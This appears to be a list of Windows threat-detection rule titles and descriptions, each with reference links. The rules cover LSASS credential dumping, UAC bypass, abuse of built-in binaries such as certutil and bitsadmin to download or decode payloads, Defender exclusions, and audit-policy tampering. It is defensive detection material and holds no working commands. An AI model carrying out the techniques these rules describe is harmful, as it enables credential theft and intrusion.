Winlogon Helper DLL Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md
Potential WinAPI Calls Via PowerShell Scripts Detects use of WinAPI functions in PowerShell scripts https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Windows Defender Exclusions Added - PowerShell Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html
WMImplant Hack Tool Detects parameters used by WMImplant https://github.com/FortyNorthSecurity/WMImplant
Powershell WMI Persistence Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545
WMIC Unquoted Services Path Lookup - PowerShell Detects a known WMI recon method to look for unquoted service paths, often used by pentesters and attackers inside of PowerShell enumeration scripts. https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Suspicious X509Enrollment - Ps Script Detect use of X509Enrollment https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115
Powershell XML Execute Command Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests
CMSTP Execution Process Access Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
HackTool - CobaltStrike BOF Injection Pattern Detects a typical pattern of a CobaltStrike BOF which injects into other processes. https://github.com/boku7/injectAmsiBypass, https://github.com/boku7/spawn
HackTool - Generic Process Access Detects process access requests from hacktool processes based on their default image name https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158, https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html
HackTool - LittleCorporal Generated Maldoc Injection Detects the process injection of a LittleCorporal generated Maldoc. https://github.com/connormcgarr/LittleCorporal
HackTool - HandleKatz Duplicating LSASS Handle Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles https://github.com/codewhitesec/HandleKatz
Lsass Memory Dump via Comsvcs DLL Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. https://twitter.com/shantanukhande/status/1229348874298388484, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
HackTool - SysmonEnte Execution Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html, https://github.com/codewhitesec/SysmonEnte/, https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png
LSASS Memory Access by Tool With Dump Keyword In Name Detects LSASS process access requests from a source process with the "dump" keyword in its image name. https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
Potential Credential Dumping Activity Via LSASS Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature. https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md, https://research.splunk.com/endpoint/windows_possible_credential_dumping/
Credential Dumping Activity By Python Based Tool Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz. https://twitter.com/bh4b3sh/status/1303674603819081728, https://github.com/skelsec/pypykatz
Remote LSASS Process Access Through Windows Remote Management Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz. https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
Suspicious LSASS Access Via MalSecLogon Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right. https://twitter.com/SBousseaden/status/1541920424635912196, https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml, https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html
Potentially Suspicious GrantedAccess Flags On LSASS Detects process access requests to LSASS process with potentially suspicious access flags https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Credential Dumping Attempt Via WerFault Detects an LSASS process memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for Win10, Server 2016 and up. https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507
LSASS Access From Potentially White-Listed Processes Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz, https://twitter.com/mrd0x/status/1460597833917251595
Uncommon Process Access Rights For Target Image Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask. https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
Potential Direct Syscall of NtOpenProcess Detects potential calls to NtOpenProcess directly from NTDLL. https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6
Credential Dumping Attempt Via Svchost Detects when a process tries to access the memory of svchost to potentially dump credentials. Internal Research
Suspicious Svchost Process Access Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service. https://github.com/hlldz/Invoke-Phant0m, https://twitter.com/timbmsft/status/900724491076214784
Function Call From Undocumented COM Interface EditionUpgradeManager Detects function calls from the EditionUpgradeManager COM interface, which is an interface that is not used by standard executables. https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/, https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611
UAC Bypass Using WOW64 Logger DLL Hijack Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) https://github.com/hfiref0x/UACME
Compress Data and Lock With Password for Exfiltration With 7-ZIP An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
7Zip Compressing Dump Files Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Potential DLL Injection Via AccCheckConsole Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass them via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340, https://twitter.com/bohops/status/1477717351017680899?s=12, https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/
Suspicious AddinUtil.EXE CommandLine Execution Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon Child Process Of AddinUtil.EXE Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon AddinUtil.EXE CommandLine Execution Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
AddinUtil.EXE Execution From Uncommon Directory Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Potential Adplus.EXE Abuse Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/, https://twitter.com/nas_bench/status/1534916659676422152, https://twitter.com/nas_bench/status/1534915321856917506
AgentExecutor PowerShell Execution Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass", or any binary named "powershell.exe" located in the path provided by the 6th positional argument. https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1
Suspicious AgentExecutor PowerShell Execution Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass", or any binary named "powershell.exe" located in the path provided by the 6th positional argument. https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1
Uncommon Child Process Of Appvlp.EXE Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/
AspNetCompiler Execution Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Suspicious Child Process of AspNetCompiler Detects potentially suspicious child processes of "aspnet_compiler.exe". https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE Detects the start of a non-built-in assistive technology application via "Atbroker.EXE". http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
Hiding Files with Attrib.exe Detects usage of attrib.exe to hide files from users. https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/, https://www.uptycs.com/blog/lolbins-are-no-laughing-matter
Set Suspicious Files as System Files Using Attrib.EXE Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files, hiding them from users and making them impossible to delete with simple rights. The rule limits the search to specific extensions and directories to avoid false positives. https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4, https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/
Interactive AT Job Detects an interactive AT job, which may be used as a form of privilege escalation. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md, https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html
Audit Policy Tampering Via NT Resource Kit Auditpol Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
Audit Policy Tampering Via Auditpol Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
Indirect Inline Command Execution Via Bash.EXE Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. https://lolbas-project.github.io/lolbas/Binaries/Bash/
Indirect Command Execution From Script File Via Bash.EXE Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. https://lolbas-project.github.io/lolbas/Binaries/Bash/, https://linux.die.net/man/1/bash, Internal Research
Boot Configuration Tampering Via Bcdedit.EXE Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE Detects potential malicious and unauthorized usage of bcdedit.exe https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set, https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2
Data Export From MSSQL Table Via BCP.EXE Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. https://docs.microsoft.com/en-us/sql/tools/bcp-utility, https://asec.ahnlab.com/en/61000/, https://asec.ahnlab.com/en/78944/, https://www.huntress.com/blog/attacking-mssql-servers, https://www.huntress.com/blog/attacking-mssql-servers-pt-ii, https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
Suspicious Child Process Of BgInfo.EXE Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
BitLockerTogo.EXE Execution Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption for removable data drives. This feature covers the encryption of USB flash drives, SD cards, external hard disk drives, and other drives formatted with the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application, and any usage of it is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing. https://tria.ge/240521-ynezpagf56/behavioral1, https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091, https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/, https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/
Uncommon Child Process Of BgInfo.EXE Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Suspicious Download From Direct IP Via Bitsadmin Detects usage of bitsadmin downloading a file using a URL that contains an IP address. https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
File Download Via Bitsadmin Detects usage of bitsadmin downloading a file https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
Suspicious Download From File-Sharing Website Via Bitsadmin Detects usage of bitsadmin downloading a file from a suspicious domain https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
File With Suspicious Extension Downloaded Via Bitsadmin Detects usage of bitsadmin downloading a file with a suspicious extension https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
File Download Via Bitsadmin To A Suspicious Target Folder Detects usage of bitsadmin downloading a file to a suspicious target folder https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
File Download Via Bitsadmin To An Uncommon Target Folder Detects usage of bitsadmin downloading a file to an uncommon target folder. https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
Monitoring For Persistence Via BITS BITS allows you to schedule a command that executes after a successful download to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor within the system and for persistence: a BITS job is chained to schedule the download of malware/additional binaries and execute the program after it has been downloaded. https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html, http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html, https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Potential Data Stealing Via Chromium Headless Debugging Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control https://github.com/defaultnamehere/cookie_crimes/, https://mango.pdf.zone/stealing-chrome-cookies-without-a-password, https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/, https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/
Browser Execution In Headless Mode Detects execution of Chromium based browser in headless mode https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
File Download with Headless Browser Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
Chromium Browser Instance Executed With Custom Extension Detects a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension. https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers
Chromium Browser Headless Execution To Mockbin Like Site Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). https://www.zscaler.com/blogs/security-research/steal-it-campaign
Suspicious Chromium Browser Instance Executed With Custom Extension Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers
File Download From Browser Process Via Inline URL Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. https://twitter.com/mrd0x/status/1478116126005641220, https://lolbas-project.github.io/lolbas/Binaries/Msedge/
Browser Started with Remote Debugging Detects browsers starting with the remote debugging flags, a technique often used to perform browser injection attacks. https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf, https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/, https://github.com/defaultnamehere/cookie_crimes/, https://github.com/wunderwuzzi23/firefox-cookiemonster
Tor Client/Browser Execution Detects the use of Tor or Tor-Browser to connect to onion routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
Suspicious Calculator Usage Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. https://twitter.com/ItsReallyNick/status/1094080242686312448
Potential Binary Proxy Execution Via Cdb.EXE Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/, https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html, https://twitter.com/nas_bench/status/1534957360032120833
New Root Certificate Installed Via CertMgr.EXE Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md, https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/
File Download via CertOC.EXE Detects when a user downloads a file by using CertOC.exe https://lolbas-project.github.io/lolbas/Binaries/Certoc/
File Download From IP Based URL Via CertOC.EXE Detects when a user downloads a file from an IP based URL using CertOC.exe https://lolbas-project.github.io/lolbas/Binaries/Certoc/
DLL Loaded via CertOC.EXE Detects when a user installs certificates by using CertOC.exe to load the target DLL file. https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/
Suspicious DLL Loaded via CertOC.EXE Detects when a user installs certificates by using CertOC.exe to load the target DLL file. https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/
New Root Certificate Installed Via Certutil.EXE Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
File Decoded From Base64/Hex Via Certutil.EXE Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/JohnLaTwC/status/835149808817991680, https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Suspicious Download Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Suspicious File Downloaded From Direct IP Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://twitter.com/_JohnHammond/status/1708910264261980634
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
File Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Potential NTLM Coercion Via Certutil.EXE Detects possible NTLM coercion via certutil using the 'syncwithWU' flag https://github.com/LOLBAS-Project/LOLBAS/issues/243
Suspicious File Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file's extension is suspicious. https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior
File In Suspicious Location Encoded To Base64 Via Certutil.EXE Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior
Certificate Exported Via Certutil.EXE Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
Suspicious CodePage Switch Via CHCP Detects a code page switch in command line or batch scripts to a rare language https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://twitter.com/cglyer/status/1183756892952248325
Console CodePage Lookup Via CHCP Detects use of chcp to look up the system locale value as part of host discovery https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
